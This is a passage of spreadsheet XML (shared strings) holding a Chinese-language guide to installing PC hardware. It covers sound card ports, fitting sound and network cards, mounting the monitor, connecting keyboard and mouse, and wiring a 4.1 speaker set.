        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的连接并向</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MODEM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传送话筒信号，所以配合</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MODEM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡和软件，可使电脑具备电话自动应答功能。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>g.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音频输入接口（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IN</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音源线将来自</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD/DVD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光驱的模拟音频信号接入。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>h.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助设备接口（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AUX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IN</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：用于将电视卡，解压卡等设备的声音信号输入声卡并通过音箱播放。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>i.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音频输入接口（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SPDIF</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：用来接收来自光驱的数字音频信号。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>j.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音频扩展接口（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SPDIF</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>EXT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：接到数字</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>I/O</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>子卡，实现数字信号的输入和输出，并可输出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AC-3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号等。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，找到一空余的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽，并从机箱后壳上移除对应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽上的扩充挡板及螺丝。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第二步，将声卡小心的对准</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽并且很确实的插入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽中。</t>
    </r>
  </si>
  <si>
    <r>
      <t>注意：务必确认将卡上的金手指的金属触点很确实的与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽接触在一起。　　</t>
    </r>
  </si>
  <si>
    <t>第三步，将螺丝用解刀锁上使声卡确实的固定在机箱壳上。　　</t>
  </si>
  <si>
    <t>第四步，确认无误后，重新开启电源，既完成声卡的硬件安装。</t>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装网卡</t>
    </r>
  </si>
  <si>
    <t>网卡的安装也很简单：</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先确认机箱电源在关闭的状态下，将网卡插入机箱的某个空闲的扩展槽中，插的时候注意要对准插槽；用两只手的大姆指把网卡插入插槽内，一定要把网卡插紧；上好螺钉，并拧紧；最后，将做好的网线上的水晶头连接到网卡的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>RJ45</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口上。</t>
    </r>
  </si>
  <si>
    <t>八、连接外部设备　　</t>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装显示器　</t>
    </r>
  </si>
  <si>
    <t>①把显示器侧放：在搬动显示器时，应先观察显示器，一般在显示器的两侧回有一个方便手那的扣槽，用户扣这个扣槽就可以方便地搬动显示器了，我们首先把显示器侧放。</t>
  </si>
  <si>
    <t>②显示器底部有几个卡口：在显示器的底部有许多小孔，其中就有安装底座的安装孔。此外，你还可看到显示器的底座上有几个突起的塑料弯钩，这几塑料弯钩就是用来固定显示器底部的。　</t>
  </si>
  <si>
    <t>③安装底座：</t>
  </si>
  <si>
    <t>第一步是将底座上突出的塑料弯钩与显示器底部的小孔对准，要注意插入的方向。</t>
  </si>
  <si>
    <t>第二步是是将显示器底座按正确的方向插入显示器底部的插孔内。</t>
  </si>
  <si>
    <t>第三步是用力推动底座。</t>
  </si>
  <si>
    <t>第四步是听见“咔”的一声响，显示器底座就已固定在显示器上了。</t>
  </si>
  <si>
    <t>④连接显示器的电源：从附袋里取出电源连接线，将显示器电源连接线的另外一端连接到电源插座上。</t>
  </si>
  <si>
    <t>⑤连接显示器的信号线：</t>
  </si>
  <si>
    <r>
      <t>把显示器后部的信号线与机箱后面的显卡输出端相连接，显卡的输出端是一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>15</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔的三排插座，厂商在设计插头的时候为了防止插反，将插头的外框设计为梯形，只要将显示器信号线的插头插到上面就行了。如果使用的显卡是主板集成的，那么一般情况下显示器的输出插孔位置是在串口一的下方，如果不能确定，那么请按照说明书上的说明进行安装。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、连接鼠标、键盘　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘和鼠标是现在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中最重要的输入设备，必须安装。键盘和鼠标的安装很简单，你只需将其插头对准缺口方向插入主板上的键盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼠标插座即可。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>现在最常见的是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PS/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口的键盘和鼠标，这两种接口的插头是一样的，很容易弄混淆，所以我们在连接的时候要看清楚。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按接口内型，鼠标可以分为串口、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PS/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>USB</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三类，传统的鼠标是串口连接的，它占用了一个串行通讯口。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PS/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口的鼠标是目前市场上的主流产品，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>USB</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口也是一种输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出接口，用于连接键盘、鼠标、数码相机等外不设备。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>USB</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口的鼠标是现在的新产品，键盘有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PS/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口，也有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>USB</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>提示：键盘后的塑料块可以搬动，使键盘有点角度，便于操作。键盘接口用于连接计算机的输入设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>--</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘，接入的是一个五针的圆型插头。连接键盘接口的时候要注意其方向性，即插头上的小舌头一定要对准插孔中的方形孔。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装和连接音箱　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在多媒体电脑中音箱已成为必不可少的放音设备。而随着技术的发展，多声道</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有源音箱日成主流。所以现在的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音箱大都使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>式和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>式及</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>式的——例如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>音箱一般由</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个低音炮和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个卫星音箱组成，再配上较专业的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声卡，你就能获得环绕声较强的音响效果。下面我们就以“漫步者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”音箱为例为你讲讲音箱的连接。　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漫步者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>由低音炮</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R401T</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个无源音箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>R80NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组成。首先让我们来观察其主音箱（低音炮）的背面，最左端是电源线插座和电源开关，在没有将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个卫星音箱接好之前，电源最好不要开启，首先让我们将卫星音箱和主音箱连接起来。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一、连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个卫星音箱：在音箱背部的输出插孔，可以发现“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>+ R -</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”、“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>- L +</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”等英文字样，它分别代表“右环绕音箱的正负极、左环绕音箱的正负极”</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个音箱的连接位置。对于卫星音箱来说，在技术指标上并没有任何区别，换而言之，它们是完全一样的两个产品，之所以能产生两个声道的效果完全是声卡的功效所致。所以，在连接的时候，我们只需要将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个音箱接上就可以了，但是在连接的时候要注意音箱的正负极。连接时要注意线的颜色对应，并不要将两接头之间相碰短路。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第二、连接音源。如果使用的是真正的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声道及以上的音源（声卡），可将音箱“输入方式”选择开关拨到“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声道”一侧，这时组成的是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统，线路输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口作为左右声道（或称前置声道）输入，线路输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口作为环绕声道输入。（见图</t>
    </r>
    <r>
      <rPr>
